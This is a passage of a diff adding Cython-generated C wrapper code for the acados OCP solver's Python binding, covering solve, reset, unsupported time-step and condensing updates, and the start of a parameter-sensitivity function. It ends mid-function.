__get_pointers_solver(self): # <<<<<<<<<<<<<< + * """ + * Private function to get the pointers for solver + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":108 + * + * + * def solve(self): # <<<<<<<<<<<<<< + * """ + * Solve the ocp with current input. + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_5solve(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_4solve, "\n Solve the ocp with current input.\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_5solve = {"solve", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_5solve, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_4solve}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_5solve(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("solve (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("solve", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "solve", 0))) return NULL; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_4solve(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_4solve(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("solve", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":112 + * Solve the ocp with current input. + * """ + * return acados_solver.acados_solve(self.capsule) # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyInt_From_int(lat_acados_solve(__pyx_v_self->capsule)); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 112, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":108 + * + * + * def solve(self): # <<<<<<<<<<<<<< + * """ + * Solve the ocp with current input. + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.solve", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":115 + * + * + * def reset(self): # <<<<<<<<<<<<<< + * """ + * Sets current iterate to all zeros. + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_7reset(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_6reset, "\n Sets current iterate to all zeros.\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_7reset = {"reset", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_7reset, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_6reset}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_7reset(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("reset (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("reset", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "reset", 0))) return NULL; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_6reset(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_6reset(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("reset", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":119 + * Sets current iterate to all zeros. + * """ + * return acados_solver.acados_reset(self.capsule) # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyInt_From_int(lat_acados_reset(__pyx_v_self->capsule)); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 119, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":115 + * + * + * def reset(self): # <<<<<<<<<<<<<< + * """ + * Sets current iterate to all zeros. + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.reset", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":122 + * + * + * def set_new_time_steps(self, new_time_steps): # <<<<<<<<<<<<<< + * """ + * Set new time steps. + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_9set_new_time_steps(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_8set_new_time_steps, "\n Set new time steps.\n Recreates the solver if N changes.\n\n :param new_time_steps: 1 dimensional np array of new time steps for the solver\n\n .. note:: This allows for different use-cases: either set a new size of time-steps or a new distribution of\n the shooting nodes without changing the number, e.g., to reach a different final time. Both cases\n do not require a new code export and compilation.\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_9set_new_time_steps = {"set_new_time_steps", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_9set_new_time_steps, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_8set_new_time_steps}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_9set_new_time_steps(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v_new_time_steps = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("set_new_time_steps (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_new_time_steps,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_new_time_steps)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 122, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "set_new_time_steps") < 0)) __PYX_ERR(0, 122, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_new_time_steps = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("set_new_time_steps", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 122, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.set_new_time_steps", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_8set_new_time_steps(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_new_time_steps); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_8set_new_time_steps(CYTHON_UNUSED struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v_new_time_steps) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("set_new_time_steps", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":134 + * """ + * + * raise NotImplementedError("AcadosOcpSolverCython: does not support set_new_time_steps() since it is only a prototyping feature") # <<<<<<<<<<<<<< + * # # unlikely but still possible + * # if not self.solver_created: + */ + __pyx_t_1 = __Pyx_PyObject_Call(__pyx_builtin_NotImplementedError, __pyx_tuple__11, NULL); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 134, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_Raise(__pyx_t_1, 0, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(0, 134, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":122 + * + * + * def set_new_time_steps(self, new_time_steps): # <<<<<<<<<<<<<< + * """ + * Set new time steps. + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.set_new_time_steps", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":173 + * + * + * def update_qp_solver_cond_N(self, qp_solver_cond_N: int): # <<<<<<<<<<<<<< + * """ + * Recreate solver with new value `qp_solver_cond_N` with a partial condensing QP solver. + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_11update_qp_solver_cond_N(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_10update_qp_solver_cond_N, "\n Recreate solver with new value `qp_solver_cond_N` with a partial condensing QP solver.\n This function is relevant for code reuse, i.e., if either `set_new_time_steps(...)` is used or\n the influence of a different `qp_solver_cond_N` is studied without code export and compilation.\n :param qp_solver_cond_N: new number of condensing stages for the solver\n\n .. note:: This function can only be used in combination with a partial condensing QP solver.\n\n .. note:: After `set_new_time_steps(...)` is used and depending on the new number of time steps it might be\n necessary to change `qp_solver_cond_N` as well (using this function), i.e., typically\n `qp_solver_cond_N < N`.\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_11update_qp_solver_cond_N = {"update_qp_solver_cond_N", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_11update_qp_solver_cond_N, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_10update_qp_solver_cond_N}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_11update_qp_solver_cond_N(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v_qp_solver_cond_N = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("update_qp_solver_cond_N (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_qp_solver_cond_N,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_qp_solver_cond_N)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 173, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "update_qp_solver_cond_N") < 0)) __PYX_ERR(0, 173, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_qp_solver_cond_N = ((PyObject*)values[0]); + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("update_qp_solver_cond_N", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 173, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.update_qp_solver_cond_N", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_qp_solver_cond_N), (&PyInt_Type), 0, "qp_solver_cond_N", 1))) __PYX_ERR(0, 173, __pyx_L1_error) + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_10update_qp_solver_cond_N(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_qp_solver_cond_N); + + /* function exit code */ + goto __pyx_L0; + __pyx_L1_error:; + __pyx_r = NULL; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_10update_qp_solver_cond_N(CYTHON_UNUSED struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v_qp_solver_cond_N) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("update_qp_solver_cond_N", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":186 + * `qp_solver_cond_N < N`. + * """ + * raise NotImplementedError("AcadosOcpSolverCython: does not support update_qp_solver_cond_N() since it is only a prototyping feature") # <<<<<<<<<<<<<< + * + * # # unlikely but still possible + */ + __pyx_t_1 = __Pyx_PyObject_Call(__pyx_builtin_NotImplementedError, __pyx_tuple__12, NULL); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 186, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_Raise(__pyx_t_1, 0, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(0, 186, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":173 + * + * + * def update_qp_solver_cond_N(self, qp_solver_cond_N: int): # <<<<<<<<<<<<<< + * """ + * Recreate solver with new value `qp_solver_cond_N` with a partial condensing QP solver. + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.update_qp_solver_cond_N", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":207 + * + * + * def eval_param_sens(self, index, stage=0, field="ex"): # <<<<<<<<<<<<<< + * """ + * Calculate the sensitivity of the curent solution with respect to the initial state component of index + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_13eval_param_sens(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_12eval_param_sens, "\n Calculate the sensitivity of the curent solution with respect to the initial state component of index\n\n :param index: integer corresponding to initial state index in range(nx)\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_13eval_param_sens = {"eval_param_sens", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_13eval_param_sens, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_12eval_param_sens}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_13eval_param_sens(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_index = 0; + PyObject *__pyx_v_stage = 0; + PyObject *__pyx_v_field = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("eval_param_sens (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_index,&__pyx_n_s_stage,&__pyx_n_s_field,0}; + PyObject* values[3] = {0,0,0}; + values[1] = ((PyObject *)__pyx_int_0); + values[2] = ((PyObject *)__pyx_n_u_ex); + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_index)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 207, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_stage); + if (value) { values[1] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 207, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_field); + if (value) { values[2] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 207, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "eval_param_sens") < 0)) __PYX_ERR(0, 207, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_index = values[0]; + __pyx_v_stage = values[1]; + __pyx_v_field = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("eval_param_sens", 0, 1, 3, __pyx_nargs); __PYX_ERR(0, 207, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.eval_param_sens", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_12eval_param_sens(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_index, __pyx_v_stage, __pyx_v_field); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_12eval_param_sens(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_index, PyObject *__pyx_v_stage, PyObject *__pyx_v_field) { + PyObject *__pyx_v_field_ = NULL; + int __pyx_v_nx; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + int __pyx_t_5; + int __pyx_t_6; + char const *__pyx_t_7; + Py_ssize_t __pyx_t_8; + Py_UCS4 __pyx_t_9; + char *__pyx_t_10; + int __pyx_t_11; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("eval_param_sens", 0); + __Pyx_INCREF(__pyx_v_field); + + /* "acados_template/acados_ocp_solver_pyx.pyx":214 + * """ + * + * field_ = field # <<<<<<<<<<<<<< + * field = field_.encode('utf-8') + * + */ + __Pyx_INCREF(__pyx_v_field); + __pyx_v_field_ = __pyx_v_field; + + /* "acados_template/acados_ocp_solver_pyx.pyx":215 + * + * field_ = field + * field = field_.encode('utf-8') # <<<<<<<<<<<<<< + * + * # checks + */ + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_v_field_, __pyx_n_s_encode); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 215, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_2))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_2, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_kp_u_utf_8}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 215, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + 